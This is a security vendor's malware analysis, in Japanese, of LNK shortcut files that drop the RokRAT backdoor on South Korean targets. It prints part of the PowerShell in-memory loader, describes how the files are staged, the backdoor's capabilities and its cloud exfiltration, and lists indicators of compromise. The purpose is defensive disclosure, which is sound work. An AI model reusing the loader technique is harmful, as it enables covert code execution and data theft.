AhnLab SEcurity intelligence Center (ASEC)は、バックドアタイプのマルウェアを配布する異常なサイズのショートカットファイル(*.LNK)が継続的に配布されていることを確認した。最近確認されたショートカットファイル(*.LNK)は、韓国国内ユーザー、特に対北朝鮮関連の人事を対象に配布していることが確認されている。確認された LNK ファイル名は以下の通りである。
- 国家情報アカデミー8期統合課程修了証(最終版).lnk
- Gate access roster 2024.lnk
- 東北工程(米国議会調査局(CRS Report).lnk
- 設備目録.lnk
図1. 確認された LNK ファイルのプロパティ
確認された LNK ファイルは CMD によって PowerShell を実行するコマンドが挿入されており、去年掲載した「リンクファイル(*.lnk)によって拡散する RokRAT マルウェア:RedEyes(ScarCruft)」[1]と類似したタイプであることが確認された。このタイプは LNK ファイルの内部に正常なドキュメントファイルとスクリプトコード、不正な PE データを含んでいることが特徴である。
図2. LNK ファイルに含まれた PDF ファイルとスクリプトコード
マルウェアの簡略な動作プロセスは以下の通りである。
図3. 動作構造
LNK ファイルを実行すると PowerShell コマンドが実行され、正常なドキュメントファイルを作成して実行する。
図4. 作成された正常なドキュメントファイル
その後 %public% フォルダーに3つのファイルを生成する。このとき作成されるファイルの名前と機能は以下の通りである。
| ファイル名 | LNK ファイル内の位置 | 機能 |
|---|---|---|
| viewer.dat | 0x2BC97 (size:0xD9402) | エンコードされた RokRAT マルウェア |
| search.dat | 0x105099 (size:0x5AA) | viewer.dat ファイルの実行 |
| find.bat | 0x105643 (size:0x139) | search.dat ファイルの実行 |
最初に実行される「find.bat」は PowerShell によって「search.dat」を実行する。「search.dat」は「viewer.dat」ファイルを読み込み、fileless 形式で実行する。
1 $exePath=$env:public+'\'+'viewer.dat';
2 $exeFile = Get-Content -path $exePath -encoding byte;
3 [Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072);
4 $k1123 = [System.Text.Encoding]::UTF8.GetString(34) + 'kernel32.dll' + [System.Text.Encoding]::UTF8.GetString(34);
5 <中略>
6 $byteCount = $exeFile.Length;
7 $buffer = $b::GlobalAlloc(0x0040, $byteCount + 0x100);
8 $old = 0;
9 $a90234sb::VirtualProtect($buffer, $byteCount + 0x100, 0x40, [ref]$old);
10 for($i = 0;$i -lt $byteCount;$i++) {
11 [System.Runtime.InteropServices.Marshal]::WriteByte($buffer, $i, $exeFile[$i]); };
12 $handle = $cake3sd23::CreateThread(0, 0, $buffer, 0, 0, 0);
13 $fried3sd23::WaitForSingleObject($handle, 500 * 1000);最終的に実行された「viewer.dat」のデータは RokRAT マルウェアであり、クラウド API を利用してユーザー情報を収集し、攻撃者のコマンドに応じて様々な不正な振る舞いを実行することができるバックドアタイプのマルウェアである。
収集された情報は pcloud、yandex DropBox などのクラウドサービスを使用して攻撃者のクラウドサーバーに転送される。この際、リクエストヘッダの UserAgent は Googlebot に偽装しており、使用されているクラウドの URL は以下の表の通りである。
- User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
攻撃者のコマンドに応じて実行可能な不正な振る舞いは、以下の通りである。
- コマンド(命令)の実行
- ディレクトリリストの収集
- スタートアッププログラムフォルダー内の特定のファイル(VBS、CMD、BAT、lnk 拡張子)の削除
- スタートアッププログラムフォルダーの一覧、%APPDATA% フォルダーの一覧、最近使用したファイル一覧の収集
- PC 情報の収集(システム情報、IP、ルーター情報等)
このほかにも様々な不正な振る舞いが実行される可能性があり、収集された情報は %TEMP% フォルダーに保存後、攻撃者のクラウドサーバーにアップロードされる。解析の過程で確認された攻撃者のメールアドレスは以下の通りである。
- tanessha.samuel@gmail[.]com
- tianling0315@gmail[.]com
- w.sarah0808@gmail[.]com
- softpower21cs@gmail[.]com
ASEC では、当社ブログを通じて不正なショートカットファイルについて以前から共有を続けてきただけあり、当該マルウェアの配布が頻繁に確認されている。特に、南北統一、軍事、教育関連の従事者を対象とするマルウェアは以前からから確認され続けており、特に注意が必要である。
[ファイル検知]
Dropper/LNK.S2343 (2024.04.12.03)
Trojan/BAT.Runner (2024.04.12.00)
Trojan/Script.Generic (2024.04.12.00)
Data/BIN.EncPe (2024.04.12.00)
Infostealer/Win.Agent.R579429 (2023.05.05.01)
[IoC]
b85a6b1eb7418aa5da108bc0df824fc0
358122718ba11b3e8bb56340dbe94f51
35441efd293d9c9fb4788a3f0b4f2e6b
68386fa9933b2dc5711dffcee0748115
bd07b927bb765ccfc94fadbc912b0226
6e5e5ec38454ecf94e723897a42450ea
3114a3d092e269128f72cfd34812ddc8
bd98fe95107ed54df3c809d7925f2d2c
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
The post RokRAT マルウェアを配布する LNK ファイル (修了証に偽装) appeared first on ASECブログ.